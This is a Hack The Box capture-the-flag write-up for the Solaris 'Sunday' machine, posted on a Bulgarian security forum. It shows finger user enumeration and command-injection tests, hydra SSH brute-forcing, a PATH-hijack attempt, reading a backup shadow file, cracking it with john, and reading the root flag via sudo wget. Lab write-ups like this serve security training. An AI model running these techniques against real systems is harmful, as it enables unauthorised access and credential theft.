Преминете към съдържанието

МЕУ организира кампания за пентестове в държавната администрация

Целта на кампанията е да подобри киберсигурността в държавната администрация, като участието в нея е доброволно и не се обвързва с възнаграждение.
Прочети повече за програмата

Добре дошли в Хакинг.БГ! 

Всеки един от нас стои на раменете на гигантите, споделили знанията и опита си с нас.

Този форум е нашият начин да върнем жеста за бъдещите и текущите кадри в киберсигурността.

Стремим се да предоставим платформа, където членовете могат да развиват своите умения, като се дава приоритет на етиката, сигурността и поверителността!

  • HTB - WriteUps




# Enumeration Stage

### NMAP 
There is a firewall that is filtering our requests. To bypass it I have ran the script with the -sS and -A tags.
1. sS (TCP SYN scan)
           SYN scan is the default and most popular scan option for good reasons. It can be performed quickly,
           also relatively unobtrusive and stealthy since it never completes TCP connections. SYN scan works
           connection. You send a SYN packet, as if you are going to open a real connection and then wait for a
           response. A SYN/ACK indicates the port is listening (open), while a RST (reset) is indicative of a
           is received. The port is also considered open if a SYN packet (without the ACK flag) is received in
           TCP connect scan is the default TCP scan type when SYN scan is not an option. 

The service scan reveals five open ports.

# nmap -p- -sV -sC -T4 
79/tcp    open  finger  Sun Solaris fingerd
|_finger: No one logged on\x0D
111/tcp   open  rpcbind 2-4 (RPC #100000)
22022/tcp open  ssh     SunSSH 1.3 (protocol 2.0)
| ssh-hostkey: 
|   1024 d2:e5:cb:bd:33:c7:01:31:0b:3c:63:d9:82:d9:f1:4e (DSA)
|_  1024 e4:2c:80:62:cf:15:17:79:ff:72:9d:df:8b:a6:c9:ac (RSA)
44060/tcp open  unknown
44273/tcp open  rpcbind
Service Info: OS: Solaris; CPE: cpe:/o:sun:sunos

### Port 79/tcp finger
**Finger** is a program you can use to find information about computer users. It usually lists the login name, the full name, and possibly other details about the user you are fingering. These details may include the office location and phone number (if known), login time, idle time, time mail was last read, and the user's plan and project files.

[This website(hacktricks.xyz)](https://book.hacktricks.xyz/pentesting/pentesting-finger) reveals **really** cool information on the service and ways to exploit it.

# finger [email protected]                                                                                    130 ⨯
Login       Name               TTY         Idle    When    Where
xvm      xVM User                           < .  .  .  . >
openldap OpenLDAP User                      < .  .  .  . >
nobody   NFS Anonymous Access               < .  .  .  . >
noaccess No Access User                     < .  .  .  . >
nobody4  SunOS 4.x NFS Anonym               < .  .  .  . >

###### metasploit finger user enumeraion
We have already enumerated some users but it doesn't hurt to try the metasploit module too. From the output we understand that there is an mysql user too. 

msf6 auxiliary(scanner/finger/finger_users) > run

msf6 auxiliary(scanner/finger/finger_users) > run

[+]        - - Found user: sunny
[+]        - - Found user: adm
[+]        - - Found user: lp
[+]        - - Found user: uucp
[+]        - - Found user: nuucp
[+]        - - Found user: dladm
[+]        - - Found user: listen
[+]        - - Found user: bin
[+]        - Users found: adm, bin, dladm, listen, lp, nuucp, sunny, uucp
[*]        - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

###### Command injection test

# finger "/bin/ls -a /@"                                                                            1 ⨯
Login       Name               TTY         Idle    When    Where
/bin/ls               ???
-a                    ???
/                     ???

# finger "|[email protected]"         
Login       Name               TTY         Idle    When    Where
|ls                   ???

### Port 111/tcp portmapper
In networks protected by firewalls and other mechanisms, access to the RPC portmapper service running on port 111 is often filtered. Therefore, determined attackers can scan high port ranges (UDP and TCP ports 32771 through 34000 on ***Solaris*** hosts) to identify RPC services that are open to direct attack.

You can run ***nmap*** with the ***-sR*** option to identify RPC services listening on high ports if the portmapper is inaccessible.

### Bruteforcing ssh service
Found password "sunday".

# hydra -I -l sunny -P /home/kali/passwords.txt -t 16 -s 22022 ssh://


[DATA] attacking ssh://
[22022][ssh] host:   login: sunny   password: sunday
1 of 1 target successfully completed, 1 valid password found

# Privilege Escalation
Logging through ssh using sunny:sunday as username:password.

# ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 [email protected] -p 22022                                   1 ⚙
Last login: Tue Apr 24 10:48:11 2018 from
Sun Microsystems Inc.   SunOS 5.11      snv_111b        November 2008

Weird file 

sunny@sunday:/tmp$ cat ogl_select253 
SUNWtext mesa
NVDAnvda nvidia

Path poison attempt. Upon logging in, I tried sudo -l and I see that /root/troll does not require password to run. Upon running my guess is that it invokes a system call "id". Therefore I am creating a file /bin/bash with the name "id" and exporting the path to that file to be executed when invoked therefore root will run /bin/bash and I should privesc. Unfortunately, the attempt is unsuccessful.```bash

sunny@sunday:/usr/share$ sudo -l                                                                                    
User sunny may run the following commands on this host:
    (root) NOPASSWD: /root/troll

sunny@sunday:/usr/share$ sudo /root/troll
uid=0(root) gid=0(root)

sunny@sunday:/tmp/$ cp /bin/bash /tmp/id
sunny@sunday:/tmp/$ chmod 777 id
sunny@sunday:/tmp/$ echo $PATH
sunny@sunday:/tmp/$ export PATH=/tmp:$PATH
sunny@sunday:/tmp/$ sudo /root/troll
uid=0(root) gid=0(root)

I have discovered a backup shadow file containing sammy's pass hash.

sunny@sunday:/backup$ cat shadow.backup

By using john, i have managed to extract the passwd from the hash. username:password == sammy:cooldude!

# john crack.txt --wordlist=/usr/share/wordlists/rockyou.txt       
Using default input encoding: UTF-8
Loaded 1 password hash (sha256crypt, crypt(3) $5$ [SHA256 128/128 AVX 4x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:26 0.74% (ETA: 12:51:05) 0g/s 4771p/s 4771c/s 4771C/s dtown214..balls2
cooldude!        (sammy)
1g 0:00:00:43 DONE (2021-05-17 11:53) 0.02300g/s 4687p/s 4687c/s 4687C/s domonique1..chrystelle
Use the "--show" option to display all of the cracked passwords reliably
Session completed

Changing user to sammy. I once again tested the mandatory "sudo -l" command and received a ***NOPASSWD*** for ***/usr/bin/wget***. According to [GTFO binaries](https://gtfobins.github.io/gtfobins/wget/) we can escalate privileges by downloading our own file and saving it to our victim (such as shadow) or simply use wget to read out files. 

sunny@sunday:/tmp$ sudo -l
User sammy may run the following commands on this host:
    (root) NOPASSWD: /usr/bin/wget
sunny@sunday:/tmp$ LFILE=/root/root.txt
sunny@sunday:/tmp$ sudo wget -i $LFILE
/root/root.txt: Invalid URL <fb40..ROOT FLAG>: Unsupported scheme
No URLs found in /root/root.txt.



Recommended Comments

Няма коментари

HACKING.BG Партньори


  • Създай ново...

Важна информация!

Политика за сигурност и условия на ползване Privacy Policy